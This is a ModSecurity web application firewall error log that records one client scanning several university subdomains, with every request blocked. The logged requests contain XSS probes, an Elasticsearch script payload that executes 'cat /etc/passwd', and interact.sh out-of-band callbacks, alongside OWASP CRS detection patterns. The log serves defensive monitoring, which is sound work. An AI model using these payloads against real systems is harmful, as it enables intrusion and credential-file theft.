[Tue Aug 29 11:56:52.772786 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lMCo-f0AAAoz8QUAAAAS"]
[Tue Aug 29 11:56:52.782933 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:{\\r\\n    "size": 1,\\r\\n    "query": {\\r\\n      "filtered": {\\r\\n        "query": {\\r\\n          "match_all": {\\r\\n          }\\r\\n        }\\r\\n      }\\r\\n    },\\r\\n    "script_fields": {\\r\\n        "command": {\\r\\n            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\\"cat /etc/passwd\\\\").getInputStream()).useDelimiter(\\\\"\\\\\\\\\\\\\\\\A\\\\").next();"\\r\\n        }\\r\\n    }\\r\\n}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:{\\x5cr\\x5cn    \\x22size\\x22: 1,\\x5cr\\x5cn    \\x22query\\x22: {\\x5cr\\x5cn      \\x22filtered\\x22: {\\x5cr\\x5cn        \\x22query\\x22: {\\x5cr\\x5cn          \\x22match_all\\x22: {\\x5cr\\x5cn          }\\x5cr\\x5cn        }\\x5cr\\x5cn      } [hostname "www.unla.ac.id"] [uri "/_search"] [unique_id "ZO16lMCo-f0AAAq-HiIAAAAT"]
[Tue Aug 29 11:56:52.901591 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lMCo-f0AAAoz8QoAAAAS"]
[Tue Aug 29 11:56:53.852285 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:share. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:share: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/giveaway/mygiveaways/"] [unique_id "ZO16lcCo-f0AAAqqtncAAAAA"]
[Tue Aug 29 11:56:53.892586 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:err_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:err_msg: <script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/free_time_failed.cgi"] [unique_id "ZO16lcCo-f0AAAqqtnkAAAAA"]
[Tue Aug 29 11:56:54.625468 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16lsCo-f0AAAq-HisAAAAT"]
[Tue Aug 29 11:56:54.659099 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16lsCo-f0AAAoz8RcAAAAS"]
[Tue Aug 29 11:56:54.697703 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16lsCo-f0AAAoz8RkAAAAS"]
[Tue Aug 29 11:56:54.716819 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16lsCo-f0AAAoz8RoAAAAS"]
[Tue Aug 29 11:56:54.737390 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16lsCo-f0AAAoz8RsAAAAS"]
[Tue Aug 29 11:56:56.118860 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAArB17EAAAAV"]
[Tue Aug 29 11:56:56.214956 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAAoz8SYAAAAS"]
[Tue Aug 29 11:56:56.215028 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAArB17YAAAAV"]
[Tue Aug 29 11:56:56.229530 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAAq-HjoAAAAT"]
[Tue Aug 29 11:56:56.256842 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAAolK@MAAAAe"]
[Tue Aug 29 11:56:56.697192 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO16mMCo-f0AAAolK@oAAAAe"]
[Tue Aug 29 11:56:56.774727 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:order: bszop\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16mMCo-f0AAAolK@0AAAAe"]
[Tue Aug 29 11:56:57.635558 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16mcCo-f0AAAoz8TYAAAAS"]
[Tue Aug 29 11:56:57.637004 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16mcCo-f0AAAq5@Y4AAAAK"]
[Tue Aug 29 11:56:57.678692 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16mcCo-f0AAAq-HkIAAAAT"]
[Tue Aug 29 11:56:57.700673 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16mcCo-f0AAArB18IAAAAV"]
[Tue Aug 29 11:56:57.739262 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16mcCo-f0AAArB18QAAAAV"]
[Tue Aug 29 11:56:59.432678 2023] [:error] [pid 2751] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:LGD_OID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:LGD_OID: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/mobile/shop/lg/mispwapurl.php"] [unique_id "ZO16m8Co-f0AAAq-HlMAAAAT"]
[Tue Aug 29 11:56:59.740293 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:wordpress_user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:wordpress_user: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plugins/wordpress_sso/pages/index.php"] [unique_id "ZO16m8Co-f0AAAoz8VsAAAAS"]
